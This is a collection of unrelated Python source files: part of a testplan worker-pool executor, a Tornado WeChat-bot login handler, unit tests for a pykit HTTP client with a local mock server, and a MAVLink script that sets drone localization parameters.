:return: True if can assign task to pool, otherwise False
:rtype: ``bool``
"""
return True
def _can_assign_task_to_worker(self, task, worker):
"""
When a worker requests a task, it is necessary to verify that
the worker is suitable to execute the task.
:param task: Task to be scheduled to worker.
:type task: :py:class:`~testplan.runners.pools.tasks.base.Task`
:param worker: A worker created by pool executor.
:type worker: :py:class:`~testplan.runners.pools.base.Worker`
:return: True if can assign task to worker, otherwise False
:rtype: ``bool``
"""
return True
def _loop(self):
"""
Main executor work loop - runs in a separate thread when the Pool is
started.
"""
if self._start_monitor_thread:
self.logger.debug("Starting worker monitor thread.")
self._worker_monitor = threading.Thread(
target=self._workers_monitoring
)
self._worker_monitor.daemon = True
self._worker_monitor.start()
while self.active and not self._exit_loop:
msg = self._conn.accept()
if msg:
try:
self.handle_request(msg)
except Exception:
self.logger.error(traceback.format_exc())
time.sleep(self.cfg.active_loop_sleep)
def handle_request(self, request):
"""
        Handles a worker request, e.g. TaskPullRequest, TaskResults, Heartbeat, etc.
:param request: Worker request.
:type request: :py:class:`~testplan.runners.pools.communication.Message`
"""
sender_index = request.sender_metadata["index"]
worker = self._workers[sender_index]
self.logger.debug(
"Pool %s received message from worker %s - %s, %s",
self.cfg.name,
worker,
request.cmd,
request.data,
)
if not worker.active:
self.logger.warning(
"Message from inactive worker %s - %s, %s",
worker,
request.cmd,
request.data,
)
response = Message(**self._metadata)
if not self.active or self.status.tag == self.STATUS.STOPPING:
worker.respond(response.make(Message.Stop))
elif request.cmd in self._request_handlers:
try:
self._request_handlers[request.cmd](worker, request, response)
except Exception:
self.logger.error(traceback.format_exc())
self.logger.debug(
"Not able to handle request from worker, sending Stop cmd"
)
worker.respond(response.make(Message.Stop))
else:
self.logger.error(
"Unknown request: {} {} {} {}".format(
request, dir(request), request.cmd, request.data
)
)
worker.respond(response.make(Message.Ack))
def _handle_cfg_request(self, worker, _, response):
"""Handle a ConfigRequest from a worker."""
options = []
cfg = self.cfg
while cfg:
options.append(cfg.denormalize())
cfg = cfg.parent
worker.respond(response.make(Message.ConfigSending, data=options))
def _handle_taskpull_request(self, worker, request, response):
"""Handle a TaskPullRequest from a worker."""
tasks = []
if self.status.tag == self.status.STARTED:
for _ in range(request.data):
try:
priority, uid = self.unassigned.get()
except queue.Empty:
break
task = self._input[uid]
if self._can_assign_task(task):
if self._task_retries_cnt[uid] > self._task_retries_limit:
self._discard_task(
uid,
"{} already reached max retries limit: {}".format(
self._input[uid], self._task_retries_limit
),
)
continue
else:
if self._can_assign_task_to_worker(task, worker):
self.logger.test_info(
"Scheduling {} to {}{}".format(
task,
worker,
" (rerun {})".format(task.reassign_cnt)
if task.reassign_cnt > 0
else "",
)
)
worker.assigned.add(uid)
tasks.append(task)
task.executors.setdefault(self.cfg.name, set())
task.executors[self.cfg.name].add(worker.uid())
self.record_execution(uid)
else:
self.logger.test_info(
"Cannot schedule {} to {}".format(task, worker)
)
self.unassigned.put(task.priority, uid)
self._task_retries_cnt[uid] += 1
else:
# Later may create a default local pool as failover option
self._discard_task(
uid,
"{} cannot be executed in {}".format(
self._input[uid], self
),
)
if tasks:
worker.respond(response.make(Message.TaskSending, data=tasks))
worker.requesting = request.data - len(tasks)
return
worker.requesting = request.data
worker.respond(response.make(Message.Ack))
def _handle_taskresults(self, worker, request, response):
"""Handle a TaskResults message from a worker."""
def task_should_rerun():
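            # Rerun only when reruns are allowed, the task requested them, the
            # previous run did not pass, and the rerun limit is not exhausted.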
if not self.cfg.allow_task_rerun:
return False
if not task_result.task:
return False
if task_result.task.rerun == 0:
return False
result = task_result.result
if (
task_result.status
and result
and result.run
and result.report.passed
):
return False
if task_result.task.reassign_cnt >= task_result.task.rerun:
self.logger.test_info(
"Will not rerun %(input)s again as it already "
"reached max rerun limit %(reruns)d",
{
"input": self._input[uid],
"reruns": task_result.task.rerun,
},
)
return False
return True
worker.respond(response.make(Message.Ack))
for task_result in request.data:
uid = task_result.task.uid()
worker.assigned.remove(uid)
self._workers_last_result.setdefault(worker, time.time())
self.logger.test_info(
"De-assign {} from {}".format(task_result.task, worker)
)
if isinstance(worker, RemoteResource):
for attachment in task_result.result.report.attachments:
attachment.source_path = rebase_path(
attachment.source_path,
worker._remote_plan_runpath,
worker._get_plan().runpath,
)
if task_should_rerun():
self.logger.test_info(
"Will rerun %(task)s for max %(rerun)d more times",
{
"task": task_result.task,
"rerun": task_result.task.rerun
- task_result.task.reassign_cnt,
},
)
self.unassigned.put(task_result.task.priority, uid)
self._task_retries_cnt[uid] = 0
self._input[uid].reassign_cnt += 1
# Will rerun task, but still need to retain the result
self._append_temporary_task_result(task_result)
continue
self._print_test_result(task_result)
self._results[uid] = task_result
self.ongoing.remove(uid)
def _handle_heartbeat(self, worker, request, response):
"""Handle a Heartbeat message received from a worker."""
worker.last_heartbeat = time.time()
self.logger.debug(
"Received heartbeat from {} at {} after {}s.".format(
worker, request.data, time.time() - request.data
)
)
worker.respond(response.make(Message.Ack, data=worker.last_heartbeat))
def _handle_setupfailed(self, worker, request, response):
"""Handle a SetupFailed message received from a worker."""
self.logger.test_info(
"Worker {} setup failed:{}{}".format(
worker, os.linesep, request.data
)
)
worker.respond(response.make(Message.Ack))
self._decommission_worker(worker, "Aborting {}, setup failed.")
def _decommission_worker(self, worker, message):
"""
        Decommission a worker by moving all of its assigned tasks back to the pool.
"""
self.logger.critical(message.format(worker))
if os.path.exists(worker.outfile):
self.logger.critical("\tlogfile: {}".format(worker.outfile))
while worker.assigned:
uid = worker.assigned.pop()
task = self._input[uid]
self.logger.test_info(
"Re-collect {} from {} to {}.".format(task, worker, self)
)
self.unassigned.put(task.priority, uid)
self._task_retries_cnt[uid] += 1
def _workers_monitoring(self):
"""
Worker fault tolerance logic. Check is based on:
1) handler status
2) heartbeat if available
"""
previous_status = {"active": [], "inactive": [], "initializing": []}
loop_interval = self.cfg.worker_heartbeat or 5 # seconds
break_outer_loop = False
while self.active:
hosts_status = {"active": [], "inactive": [], "initializing": []}
for worker in self._workers:
status, reason = self._query_worker_status(worker)
if status == "inactive":
with self._pool_lock:
if self.active and self.status.tag not in (
self.status.STOPPING,
self.status.STOPPED,
):
if self._handle_inactive(worker, reason):
status = "active"
else:
# if pool is aborting/stopping, exit monitor
break_outer_loop = True
break
hosts_status[status].append(worker)
if break_outer_loop:
break
if hosts_status != previous_status:
self.logger.info(
"%s Hosts status update", datetime.datetime.now()
)
self.logger.info(pprint.pformat(hosts_status))
previous_status = hosts_status
if (
not hosts_status["active"]
and not hosts_status["initializing"]
and hosts_status["inactive"]
):
self.logger.critical(
"All workers of {} are inactive.".format(self)
)
self.abort()
break
try:
# For early finish of worker monitoring thread.
wait_until_predicate(
lambda: not self.is_alive,
timeout=loop_interval,
interval=0.05,
)
except RuntimeError:
break
def _query_worker_status(self, worker):
"""
Query the current status of a worker. If heartbeat monitoring is
enabled, check the last heartbeat time is within threshold.
:param worker: Pool worker to query
:return: worker status string - one of 'initializing', 'inactive' or
'active', and an optional reason string
"""
if not worker.active or worker.status.tag in (
worker.status.STOPPING,
worker.status.STOPPED,
):
return "inactive", "Worker {} in stop/abort status"
if worker.status.tag in (worker.status.NONE, worker.status.STARTING):
return "initializing", None
# else: worker must be in state STARTED
if worker.status.tag != worker.status.STARTED:
raise RuntimeError(
"Worker in unexpected state {}".format(worker.status.tag)
)
if not worker.is_alive: # handler based monitoring
return (
"inactive",
"Decommission {}, handler no longer alive".format(worker),
)
        # If no heartbeat is configured, we treat the worker as "active"
# since it is in state STARTED and its handler is alive.
if not self.cfg.worker_heartbeat:
return "active", None
# else: do heartbeat based monitoring
lag = time.time() - worker.last_heartbeat
if lag > self.cfg.worker_heartbeat * self.cfg.heartbeats_miss_limit:
return (
"inactive",
"Has not been receiving heartbeat from {} for {} "
"sec".format(worker, lag),
)
return "active", None
def _handle_inactive(self, worker, reason):
"""
Handle an inactive worker.
:param worker: worker object
:type worker: :py:class:`~testplan.runners.pool.base.Worker`
:param reason: why worker is considered inactive
:type reason: ``str``
:return: True if worker restarted, else False
:rtype: ``bool``
"""
if worker.status.tag != worker.status.STARTED:
return False
self._decommission_worker(worker, reason)
if worker.restart_count:
worker.restart_count -= 1
try:
worker.restart()
return True
except Exception as exc:
self.logger.critical(
"Worker {} failed to restart: {}".format(worker, exc)
)
else:
worker.abort()
return False
def _discard_task(self, uid, reason):
self.logger.critical(
"Discard task {} of {} - {}.".format(
self._input[uid], self, reason
)
)
self._results[uid] = TaskResult(
task=self._input[uid],
status=False,
reason="Task discarded by {} - {}.".format(self, reason),
)
self.ongoing.remove(uid)
def _discard_pending_tasks(self):
self.logger.critical("Discard pending tasks of {}.".format(self))
while self.ongoing:
uid = self.ongoing[0]
self._results[uid] = TaskResult(
task=self._input[uid],
status=False,
reason="Task [{}] discarding due to {} abort.".format(
self._input[uid]._target, self
),
)
self.ongoing.pop(0)
def _append_temporary_task_result(self, task_result):
"""If a task should rerun, append the task result already fetched."""
test_report = task_result.result.report
uid = task_result.task.uid()
if uid not in self._task_retries_cnt:
return
postfix = " => Run {}".format(task_result.task.reassign_cnt)
test_report.name = "{}{}".format(test_report.name, postfix)
test_report.uid = "{}{}".format(test_report.uid, postfix)
test_report.category = ReportCategories.TASK_RERUN
test_report.status_override = "xfail"
new_uuid = strings.uuid4()
self._results[new_uuid] = task_result
self.parent._tests[new_uuid] = self.cfg.name
self.record_execution(new_uuid)
def _print_test_result(self, task_result):
if (not isinstance(task_result.result, entity.RunnableResult)) or (
not hasattr(task_result.result, "report")
):
return
# Currently prints report top level result and not details.
name = task_result.result.report.name
self.logger.log_test_status(name, task_result.result.report.status)
def _add_workers(self):
"""Initialise worker instances."""
for idx in (str(i) for i in range(self.cfg.size)):
worker = self.cfg.worker_type(
index=idx,
restart_count=self.cfg.restart_count,
active_loop_sleep=0.01,
)
worker.parent = self
worker.cfg.parent = self.cfg
self._workers.add(worker, uid=idx)
self.logger.debug(
"Added worker %(index)s (outfile = %(outfile)s)",
{"index": idx, "outfile": worker.outfile},
)
def _start_workers(self):
"""Start all workers of the pool"""
for worker in self._workers:
self._conn.register(worker)
self._workers.start()
def starting(self):
"""Starting the pool and workers."""
# TODO do we need a lock here?
self.make_runpath_dirs()
if self.runpath is None:
raise RuntimeError("runpath was not set correctly")
self._metadata = {"runpath": self.runpath}
self._conn.start()
for worker in self._workers:
# reset worker (if any) status
worker.status.change(ResourceStatus.STARTING)
self._exit_loop = False
super(Pool, self).starting() # start the loop & monitor
if not self._workers:
self._add_workers()
self._start_workers()
if self._workers.start_exceptions:
for msg in self._workers.start_exceptions.values():
self.logger.error(msg)
self.abort()
raise RuntimeError(
"All workers of {} failed to start.".format(self)
)
self.status.change(self.status.STARTED)
self.logger.debug("%s started.", self.__class__.__name__)
def workers_requests(self):
"""Count how many tasks workers are requesting."""
return sum(worker.requesting for worker in self._workers)
def _stop_workers(self):
self._workers.stop()
def stopping(self):
"""Stop connections and workers."""
with self._pool_lock:
self._stop_workers()
for worker in self._workers:
worker.transport.disconnect()
self._exit_loop = True
super(Pool, self).stopping() # stop the loop and the monitor
self._conn.stop()
self.status.change(self.status.STOPPED)
self.logger.debug("Stopped %s", self.__class__.__name__)
def abort_dependencies(self):
"""Empty generator to override parent implementation."""
return
yield
def aborting(self):
"""Aborting logic."""
self.logger.debug("Aborting pool {}".format(self))
for worker in self._workers:
worker.abort()
super(Pool, self).stopping() # stop the loop and the monitor
self._conn.abort()
self._discard_pending_tasks()
self.logger.debug("Aborted pool {}".format(self))
def record_execution(self, uid):
self._executed_tests.append(uid)
|
WxLoginHandler.py
|
#! /usr/bin/python
# -*- coding:utf-8 -*-
"""
Author: AsherYang
Email: ouyangfan1991@gmail.com
Date: 2018/7/1
Desc: Used to log in to the operations WeChat account.
This class is built on top of wxpy and wechat_sender, combined with our own weichatutil (from a private PyPI source).
Notes:
1. The background listener account must already be logged in.
2. The recipient must be a friend of the monitored WeChat account, otherwise the message cannot be delivered.
"""
import sys
sys.path.append('../')
import tornado.web
from tornado.web import asynchronous
from BaseResponse import BaseResponse
from constant import ResponseCode
from FFStoreJsonEncoder import *
from util.WxBotUtil import WxBotUtil, def_qr_path
from util.LogUtil import LogUtil
import threading
import os
class WxLoginHandler(tornado.web.RequestHandler):
def get(self, *args, **kwargs):
wxBot = WxBotUtil()
# wxBot.login_by_thread()
thr = threading.Thread(target=wxBot) # start a new thread; args=[sms_msg] and the threading details live in WxBotUtil
thr.start()
qr_path = '../static/qrcode/qrcode.png'
self.redirect(qr_path)
# self.render('qrcode.html', qr_path=qr_path)
# self.scan_qr(qr_path='/work/ffstore_server/ffstore/static/qrcode/qrcode.png')
# Because the bot in WxBotUtil blocks its thread, the callback runs into problems, so redirect directly to the static QR code page
# def scan_qr(self, **kwargs):
# qr_path = str(kwargs['qr_path'])
# logging = LogUtil().getLogging()
# logging.info('---> qrcPath: ' + qr_path)
# logging.info('--------------------------------------')
# # qr_path = '/work/ffstore_server/ffstore/static/qrcode/qrcode.png'
# if os.path.exists(qr_path) and qr_path.find('static') != -1:
# qr_code_path = qr_path[qr_path.find('static')+7:]
# logging.info('---> do qrcPath: ' + qr_code_path)
# logging.info('-----------------111111111---------------------')
# # self.render('1111111111111111111111')
# # return self.render('qrcode.html', qr_path=qr_code_path)
# # # qr_path = 'qrcode/qrcode.png'
# else:
# baseResponse = BaseResponse()
# baseResponse.code = ResponseCode.fail_wx_bot_login
# baseResponse.desc = ResponseCode.fail_wx_bot_login_desc
# json_str = json.dumps(baseResponse, cls=StrEncoder)
# self.write(json_str)
# self.finish()
|
test_httpclient.py
|
#!/usr/bin/env python2
# coding: utf-8
import gc
import os
import socket
import ssl
import threading
import time
import unittest
from BaseHTTPServer import BaseHTTPRequestHandler
from BaseHTTPServer import HTTPServer
from pykit import http
from pykit import ututil
dd = ututil.dd
HOST = '127.0.0.1'
PORT = 38002
KB = 1024
MB = (1024**2)
HOME_PATH = os.path.dirname(os.path.abspath(__file__))
class TestHttpClient(unittest.TestCase):
special_cases = {
'test_recving_server_close':
(0, 1, 'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n'),
'test_server_delay_response':
(0.5, 1, 'HTTP/1.1 200 OK\r\nContent-Length: 4\r\n\r\nabcd'),
'test_raise_chunked_size_error':
(0, 10, 'HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n\r\nfoo\r\n'),
'test_raise_socket_timeout':
(3, 1, 'H'),
'test_raise_line_too_long_error':
(0, KB, 'a' * 65536),
'test_request_chunked':
(),
'test_readlines':
(0, 10, 'HTTP/1.1 200 OK\r\nContent-Length: 131086\r\n\r\n' + 'a'*65540 + '\r\nbb\r\n' + 'c'*65540),
'test_readlines_delimiter':
(0, 10, 'HTTP/1.1 200 OK\r\nContent-Length: 15\r\n\r\nabcd\rbcde\rcdef\r'),
}
request_headers = {}
request_body = {}
def test_raise_connect_error(self):
h = http.Client(HOST, PORT)
self.assertRaises(http.NotConnectedError, h.send_body, None)
def test_raise_line_too_long_error(self):
h = http.Client(HOST, PORT)
self.assertRaises(http.LineTooLongError,
h.request, '/line_too_long')
def test_raise_response_headers_error(self):
cases = (
'/invalid_content_len',
'/invalid_header',
)
h = http.Client(HOST, PORT)
for uri in cases:
self.assertRaises(http.HeadersError, h.request, uri)
def test_raise_chunked_size_error(self):
h = http.Client(HOST, PORT)
h.request('')
self.assertRaises(http.ChunkedSizeError, h.read_body, 10)
def test_raise_response_not_ready_error(self):
h = http.Client(HOST, PORT)
self.assertRaises(http.ResponseNotReadyError, h.read_response)
def test_raise_socket_timeout(self):
h = http.Client(HOST, PORT, 2)
self.assertRaises(socket.timeout, h.request, '')
def test_raise_badstatus_line_error(self):
cases = (
'/invalid_line',
'/invalid_protocol',
'/<100',
'/>999',
)
h = http.Client(HOST, PORT)
for uri in cases:
self.assertRaises(http.BadStatusLineError, h.request, uri)
def test_raise_socket_error(self):
h = http.Client(HOST, PORT)
h.request('/socket_error')
self.assertRaises(socket.error, h.read_body, 10)
def test_get_http_request(self):
cases = (
('/get_1b', 1, 'a', (), False),
('/get_1b', 10, 'a', (), False),
('/get_1b', None, 'a', (), False),
('/get_10k', KB, 'bc' * 5 * KB, (), False),
('/get_10k', 20 * KB, 'bc' * 5 * KB, (), False),
('/get_10k', None, 'bc' * 5 * KB, (), False),
('/get_30m', 10 * MB, 'cde' * 10 * MB, (), False),
('/get_30m', 50 * MB, 'cde' * 10 * MB, (), False),
('/get_30m', None, 'cde' * 10 * MB, (), False),
('/get_10b_chunked', 1, 'f' * 10, (), True),
('/get_10b_chunked', 10, 'f' * 10, (), True),
('/get_10b_chunked', None, 'f' * 10, (), True),
('/get_10k_chunked', KB, 'gh' * 5 * KB, (), True),
('/get_10k_chunked', 20 * KB, 'gh' * 5 * KB, (), True),
('/get_10k_chunked', None, 'gh' * 5 * KB, (), True),
('/get_30m_chunked', 10 * MB, 'ijk' * 10 * MB, (), True),
('/get_30m_chunked', 50 * MB, 'ijk' * 10 * MB, (), True),
('/get_30m_chunked', None, 'ijk' * 10 * MB, (), True),
('/get_10b_range', 1, 'l' * 10, (2, 8), False),
('/get_10b_range', 10, 'l' * 10, (2, 8), False),
('/get_10b_range', None, 'l' * 10, (2, 8), False),
('/get_10k_range', KB, 'mn' * 5 * KB, (KB, 8 * KB), False),
('/get_10k_range', 20 * KB, 'mn' * 5 * KB, (KB, 8 * KB), False),
('/get_10k_range', None, 'mn' * 5 * KB, (KB, 8 * KB), False),
('/get_30m_range', 10 * MB, 'opq' * 10 * MB, (2 * MB, 25 * MB), False),
('/get_30m_range', 50 * MB, 'opq' * 10 * MB, (2 * MB, 25 * MB), False),
('/get_30m_range', None, 'opq' * 10 * MB, (2 * MB, 25 * MB), False),
)
h = http.Client(HOST, PORT)
for uri, each_read_size, expected_res, content_range, chunked in cases:
h.request(uri)
bufs = ''
if each_read_size is None:
bufs = h.read_body(None)
self.assertEqual(h.has_read, len(bufs))
else:
while True:
b = h.read_body(each_read_size)
if len(b) <= 0:
break
bufs += b
self.assertEqual(h.has_read, len(bufs))
start, end = 0, len(expected_res)
if len(content_range) >= 2:
start, end = content_range[0], content_range[1] + 1
self.assertEqual(expected_res[start:end], bufs)
self.assertEqual(None if chunked else len(bufs), h.content_length)
self.assertEqual(chunked, h.chunked)
def test_status(self):
cases = (
('/get_200', 200),
('/get_304', 304),
('/get_404', 404),
('/get_500', 500),
)
h = http.Client(HOST, PORT)
for uri, expected_status in cases:
h.request(uri)
self.assertEqual(expected_status, h.status)
def test_request_chunked(self):
h = http.Client(HOST, PORT)
h.send_request('', 'PUT', {'Transfer-Encoding': 'chunked'})
cases = (
('aaaaaaaaa', 100),
('bbbbbbbbbbbbbb', 100),
('0000000000000', 100),
('200_status', 200)
)
for body, status in cases:
h.send_body(body)
self.assertEqual(h.read_status(False), status)
def test_request_headers(self):
cases = (
('/header_1', {'host': 'example.com'}),
('/header_2', {'host': 'example.com', 'b': 'bar'}),
('/header_3', {'host': 'example.com', 'b': 'bar', 'f': 'foo'}),
)
h = http.Client(HOST, PORT)
for uri, headers in cases:
h.request(uri, headers=headers)
time.sleep(0.1)
self.assertEqual(headers, self.request_headers)
def test_response_headers(self):
cases = (
('/header_res1', {'f': 'foo'}),
('/header_res2', {'f': 'foo', 'b': 'bar'}),
('/header_res3', {'f': 'foo', 'b': 'bar', 't': 'too'}),
)
h = http.Client(HOST, PORT)
for uri, expected_headers in cases:
h.request(uri)
self.assertEqual(expected_headers, h.headers)
def test_send_body(self):
cases = (
('/put_1b', 'a', {'Content-Length': 1}),
('/put_10k', 'bc' * 5 * KB, {'Content-Length': 10 * KB}),
('/put_30m', 'cde' * 10 * MB, {'Content-Length': 30 * MB}),
)
h = http.Client(HOST, PORT)
for uri, body, headers in cases:
h.send_request(uri, method='PUT', headers=headers)
h.send_body(body)
h.read_response()
time.sleep(0.1)
self.assertEqual(body, self.request_body)
def test_readlines(self):
h = http.Client(HOST, PORT)
h.request('')
expected_body = ('a' * 65540 + '\r\n', 'bb\r\n', 'c' * 65540)
for idx, line in enumerate(h.readlines()):
self.assertEqual(expected_body[idx], line)
def test_readlines_delimiter(self):
h = http.Client(HOST, PORT)
h.request('')
expected_body = ('abcd\r', 'bcde\r', 'cdef\r')
for idx, line in enumerate(h.readlines('\r')):
self.assertEqual(expected_body[idx], line)
def test_recving_server_close(self):
h = http.Client(HOST, PORT, 3)
succ = False
try:
h.request('')
h.read_body(1024)
except socket.error as e:
dd(repr(e) + ' while recv server close')
succ = True
except Exception as e:
dd(repr(e) + ' unexpected exception')
self.assertTrue(succ)
def test_server_delay_response(self):
case = ({'content-length': '4'}, 'abcd')
expected_headers, expected_body = case
h = http.Client(HOST, PORT, 1)
h.request('')
body = h.read_body(1024)
self.assertEqual(expected_headers, h.headers)
self.assertEqual(expected_body, body)
def test_client_delay_send_data(self):
case = ('/client_delay', {'Content-Length': 10}, 'abcde' * 2)
uri, headers, body = case
h = http.Client(HOST, PORT, 3)
h.send_request(uri, method='PUT', headers=headers)
while len(body) > 0:
h.send_body(body[:1])
time.sleep(1)
body = body[1:]
self.assertEqual(case[2], self.request_body)
def test_garbage_collector(self):
h = http.Client(HOST, PORT)
h.request('/get_30m')
h.read_body(None)
del h
gc.collect()
self.assertListEqual([], gc.garbage)
def test_trace(self):
class FakeErrorDuringHTTP(Exception):
pass
h = http.Client(HOST, PORT)
h.request('/get_10k')
h.read_body(1)
h.read_body(None)
# emulate error
try:
with h.stopwatch.timer('exception'):
raise FakeErrorDuringHTTP(3)
except Exception:
pass
trace = h.get_trace()
dd('trace:', trace)
ks = (
'conn',
'send_header',
'recv_status',
'recv_header',
'recv_body',
)
for i, k in enumerate(ks):
self.assertEqual(k, trace[i]['name'])
self.assertEqual(type(0.1), type(trace[i]['time']))
names = [x['name'] for x in trace]
self.assertEqual(['conn',
'send_header',
'recv_status',
'recv_header',
'recv_body',
'recv_body',
'exception',
'pykit.http.Client'],
names)
dd('trace str:', h.get_trace_str())
def test_trace_min_tracing_milliseconds(self):
h = http.Client(HOST, PORT, stopwatch_kwargs={
'min_tracing_milliseconds': 1000})
h.request('/get_10k')
h.read_body(None)
# only steps cost time>1000 are traced. thus nothing should be traced
trace_str = h.get_trace_str()
dd('trace:', trace_str)
self.assertEqual('', trace_str)
self.assertEqual([], h.get_trace())
def test_https(self):
cases = (
('/get_1b', 'a'),
('/get_10k', 'bc' * 5 * KB),
('/get_30m', 'cde' * 10 * MB),
)
context = ssl._create_unverified_context()
cli = http.Client(HOST, PORT, https_context=context)
for uri, expected_res in cases:
cli.request(uri)
body = cli.read_body(None)
self.assertEqual(200, cli.status)
self.assertEqual(expected_res, body)
def __init__(self, *args, **kwargs):
super(TestHttpClient, self).__init__(*args, **kwargs)
self.server_thread = None
self.http_server = None
def setUp(self):
self.server_thread = threading.Thread(target=self._start_server)
self.server_thread.daemon = True
self.server_thread.start()
time.sleep(0.1)
def tearDown(self):
if self.http_server is not None:
self.http_server.shutdown()
self.http_server.server_close()
self.server_thread.join()
def _start_server(self):
if self._testMethodName in self.special_cases:
self._special_case_handle()
else:
addr = (HOST, PORT)
self.http_server = HTTPServer(addr, Handle)
if 'https' in self._testMethodName:
cert_file = os.path.join(HOME_PATH, 'test_https.pem')
self.http_server.socket = ssl.wrap_socket(self.http_server.socket,
certfile=cert_file,
server_side=True)
self.http_server.serve_forever()
def _special_case_handle(self):
addr = (HOST, PORT)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(addr)
sock.listen(10)
if self._testMethodName == 'test_request_chunked':
conn, _ = sock.accept()
for i in range(3):
data = conn.recv(1024)
dd('recv data:' + data)
res = 'HTTP/1.1 100 CONTINUE\r\n\r\n'
conn.sendall(res)
data = conn.recv(1024)
dd('recv data:' + data)
res = 'HTTP/1.1 200 OK\r\n\r\n'
conn.sendall(res)
else:
conn, _ = sock.accept()
data = conn.recv(1024)
dd('recv data:' + data)
res = self.special_cases.get(self._testMethodName)
if res is None:
return
sleep_time, each_send_size, content = res
try:
while len(content) > 0:
conn.sendall(content[:each_send_size])
content = content[each_send_size:]
time.sleep(sleep_time)
except socket.error as e:
dd(repr(e) + ' while response')
time.sleep(1)
conn.close()
sock.close()
class Handle(BaseHTTPRequestHandler):
all_responses = {
'/invalid_content_len': (200, {'content-length': 'abc'}, (0, '')),
'/invalid_header': (200, {}, (0, '')),
'/get_1b': (200, {'content-length': 1}, (1, 'a')),
'/get_10k': (200, {'content-length': 10 * KB}, (10240, 'bc' * 5 * KB)),
'/get_30m': (200, {'content-length': 30 * MB}, (10 * MB, 'cde' * 10 * MB)),
'/get_10b_chunked': (200, {'Transfer-Encoding': 'chunked'}, (5, 'f' * 10)),
'/get_10k_chunked': (200, {'Transfer-Encoding': 'chunked'}, (KB, 'gh' * 5 * KB)),
'/get_30m_chunked': (200, {'Transfer-Encoding': 'chunked'}, (10 * MB, 'ijk' * 10 * MB)),
'/get_10b_range': (206,
{'Content-Range': 'bytes %d-%d/%d' % (2, 8, 10),
'Content-Length': 7},
(5, 'l' * 10)),
'/get_10k_range': (206,
{'Content-Range': 'bytes %d-%d/%d' % (KB, 8 * KB, 10 * KB),
'Content-Length': 7 * KB + 1},
(KB, 'mn' * 5 * KB)),
'/get_30m_range': (206,
{'Content-Range': 'bytes %d-%d/%d' % (2 * MB, 25 * MB, 30 * MB),
'Content-Length': 23 * MB + 1},
(10 * MB, 'opq' * 10 * MB)),
'/get_200': (200, {}, (0, '')),
'/get_304': (304, {}, (0, '')),
'/get_404': (404, {}, (0, '')),
'/get_500': (500, {}, (0, '')),
'/header_1': (200, {}, (0, '')),
'/header_2': (200, {}, (0, '')),
'/header_3': (200, {}, (0, '')),
'/header_res1': (200, {'f': 'foo'}, (0, '')),
'/header_res2': (200, {'f': 'foo', 'b': 'bar'}, (0, '')),
'/header_res3': (200, {'f': 'foo', 'b': 'bar', 't': 'too'}, (0, '')),
'/invalid_line': (200, {}, (0, '')),
'/invalid_protocol': (200, {}, (0, '')),
'/<100': (10, {}, (0, '')),
'/>999': (1000, {}, (0, '')),
'/socket_error': (200, {'Content-Length': 10}, (0, '')),
}
def send_response(self, code, message=None):
self.log_request(code)
if message is None:
if code in self.responses:
message = self.responses[code][0]
else:
message = ''
if self.request_version != 'HTTP/0.9':
if self.path == '/invalid_protocol':
protocol = 'foo'
elif self.path == '/invalid_line':
self.wfile.write(self.protocol_version + '\r\n')
return
else:
protocol = self.protocol_version
self.wfile.write("%s %d %s\r\n" %
(protocol, code, message))
if self.path == '/invalid_header':
self.wfile.write('foo\r\n')
def do_PUT(self):
try:
length = int(self.headers.getheader('Content-Length'))
except (TypeError, ValueError) as e:
dd(repr(e))
return
read_bytes = 0
bufs = ''
try:
while read_bytes < length:
bufs += self.rfile.read(length - read_bytes)
read_bytes = len(bufs)
TestHttpClient.request_body = bufs
self.send_response(200)
self.send_header('Content-Length', 0)
self.end_headers()
except Exception as e:
dd(repr(e) + ' while parse put request')
def do_GET(self):
TestHttpClient.request_headers = self.headers.dict
res = self.all_responses.get(self.path)
if res is None:
dd('path error:' + self.path)
return
status, headers, body = res
try:
self.send_response(status)
for k, v in headers.items():
self.send_header(k, v)
self.end_headers()
self._send_body(headers, body)
except Exception as e:
dd(repr(e) + ' while parse get request')
def _send_body(self, headers, body):
each_send_size, data = self._get_body(headers, body)
ext = ';extname'
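# Chunked framing is "<hex size>[;extension]\r\n<data>\r\n"; the ';extname'
# chunk extension is toggled on alternate chunks to exercise the client's
# chunk-size parsing.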
while len(data) > 0:
send_buf = data[:each_send_size]
if 'Transfer-Encoding' in headers:
if len(ext) > 0:
ext = ''
else:
ext = ';extname'
send_buf = '%x%s\r\n%s\r\n' % (len(send_buf), ext, send_buf)
self.wfile.write(send_buf)
data = data[each_send_size:]
if 'Transfer-Encoding' in headers:
self.wfile.write('0\r\n\r\n')
def _get_body(self, headers, body):
each_send_size, data = body
start = 0
end = len(data)
if 'Content-Range' in headers:
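# Header form is "bytes <start>-<end>/<total>": strip the "bytes " prefix,
# drop "/<total>", then split "<start>-<end>" on the dash.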
val = headers['Content-Range'][6:]
val = val[:val.find('/')]
start, end = val.split('-', 1)
return each_send_size, data[int(start):int(end) + 1]
|
localization_mode.py
|
#!/usr/bin/env python3
# Copyright 2020, NTRobotics
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pymavlink import mavutil
from pymavlink.mavutil import mavlink
import threading
import time
from utils import main_utils, param_utils
connection = None
need_reboot = False
def check_and_set_param(param, param_id, param_value):
global need_reboot
if param.param_id != param_id:
return
remote_value = param_utils.decode_param(param)
if isinstance(remote_value,int):
differ = (remote_value != param_value)
else:
differ = (abs(remote_value - param_value) > 0.001)
if differ:
param_utils.set_parameter(connection, param_id, param_value)
need_reboot = True
stamp_offset_ms = None
def send_attitude():
global stamp_offset_ms
while True:
stamp = int(time.time() * 1000) + stamp_offset_ms
connection.mav.attitude_send(stamp, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0)
time.sleep(0.05)
if __name__ == '__main__':
connection = main_utils.connect()
main_utils.start_sending_heartbeat(connection)
connection.wait_heartbeat()
params = param_utils.list_params(connection)
for p in params:
print('Param %s = %3.6f' % (p.param_id, p.param_value))
check_and_set_param(p, 'SAVE_MAP', 1)
check_and_set_param(p, 'LOAD_MAP', 1)
check_and_set_param(p, 'MAP_ID', 7)
